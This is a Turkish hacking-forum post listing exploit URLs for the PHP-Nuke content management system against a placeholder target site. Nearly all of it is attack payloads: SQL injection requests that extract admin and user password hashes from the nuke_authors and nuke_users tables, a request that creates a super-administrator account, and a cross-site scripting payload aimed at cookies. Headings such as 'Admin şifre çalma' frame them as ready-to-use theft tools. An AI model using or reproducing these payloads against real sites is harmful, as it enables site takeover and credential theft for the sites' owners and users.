THT DUYURU

Web & Server Güvenliği Doğru web ve veritabanı sunucusu güvenliği sağlanmadan, bilgisayar korsanları hassas verilerinize erişebilir. Web, Sunucu ve veritabanı güvenliğini nasıl sağlayacağınızı buradan öğrenebilirsiniz.

chat
Seçenekler

PHP-Nuke Acıkları (10)

kadiir - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
02/2007
Nereden:
istanbul
Mesajlar:
250
Konular:
113
Teşekkür (Etti):
16
Teşekkür (Aldı):
143
Ticaret:
(0) %
04-06-2011 15:17
#1
PHP-Nuke Acıkları (10)
Admin oluşturma açığı

http://www.hedefsite.com/admin.php?o...at&add_name=Go d&add_pwd=tdt&add_email=foo.bar.com&add_radm in super=1&admin=eCcgVU5JT04gU0VMRUNUIDEvKjox


Admin şifre çalma açığı

http://www.hedefsite.com/modules.php...le=index&folde r=savebox&mode=read&p=99&pm_sql_user=AND%20pm.priv msgs_type=-99%20UNION%20SELECT%20aid,null,pwd,null,null,null, null,null,null,null,null,null,null,null,null,null, null,null,null,null,null,null,null,null,null,null, null,null,null,null,null%20FROM%20nuke_authors%20W HERE%20radminsuper=1%20LIMIT%201/*


SQL Injection aÇIĞI (pm okuma)

http://www.hedefsite.com/modules.php...le=index&folde r=inbox&user=eDpmb28nIFVOSU9OIFNFTEVDVCAyLG51bGwsM SwxLG51bGwvKjox


Önizleme Modunda Saldırı

http://www.hedefsite.com/modules.php...le=f001&text=f 002&score=9&email=f00.bar.org&reviewer=f00&score=9 999


Siteden Bilgi Çalma

http://www.hedefsite.com/modules.php...sdownload&sid= -1/**/UNIon/**/SELECT/**/0,0,aid,pwd,0,0,0,0,0,0,0, 0/**/FROM/**/nuke_authors/**/WHERE/**/radmins uper=1/**/LIMIT/**/1/*


Adminin Şifresini Çalma

http://www.hedefsite.com/modules.php...s&query=not123 exists&instory=/**/UNIon/**/SELECT/**/0,0,pwd,0,ai d/**/FROM/**/nuke_authors


SQL İnjection Açığı

http://www.hedefsite.com/modules.php...le=index&folde r=inbox&user=eDpmb28nIFVOSU9OIFNFTEVDVCAyLG51bGwsM SwxLG51bGwvKjox


SQL İnjection Açığı

http://www.hedefsite.com/modules.php...linkeditorial& lid=-1%20UNION%20SELECT%20name,1,pwd,aid%20FROM%20nuke_ authors



SQL İnjection Açığı

http://www.hedefsite.com/modules.php...fydownloadrequ est&lid=-1%20UNION%20SELECT%200,username,user_id,user_passw ord,name,user_email,user_level,0,0%20FROM%20nuke_u sers


SQL İnjection Açığı

http://www.hedefsite.com/modules.php...downloadeditor ial&lid=-1 %20UNION%20SELECT%20username,1,user_password,user_ id%20FROM%20nuke_users


SQL İnjection Açığı

http://www.hedefsite.com/modules.php...il,email,100,p wd,url,url,10000,name%20FROM%20nuke_autho rs/*


SQL İnjection Açığı (search module)

http://www.hedefsite.com/modules.php...&query=f00bar& category=-1&categ= and 1=2 UNION SELECT 0,0,aid,pwd,0,0,0,0,0,0 from nuke_authors/*


SQL İnjection Açığı (Survey)

http://www.hedefsite.com/modules.php...2&mode=thread& order=ppp><******>alert(********.cookie);</******> ppp&thold=99


SQL İnjection Açığı (Section Vul Exploit)

http://www.siteadi.com/modules.php?n...tpage&artid=-1 UNION SELECT CONCAT(name,char(58),aid),pwd FROM nuke_authors


SQL İnjection Açığı (Web Lİnk Module)

http://www.siteadi.com/modules.php?n...linkeditorial& lid=-1 %20UNION%20SELECT%20name,1,pwd,aid%20FROM%20nuke_a uthors


SQL İnjection Açığı (Rewiev Vul.)

http://www.siteadi.com/modules.php?n...=-1%20UNION%20 SELECT%200,0,aid,pwd,email,email,100,pwd,url,url,1 0000,name%20FROM%20nuke_autho rs/*


Bir Tesekur Bir Dk ALmaz..
5236423, bozkurt97, mechengineer Teşekkür etti.

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler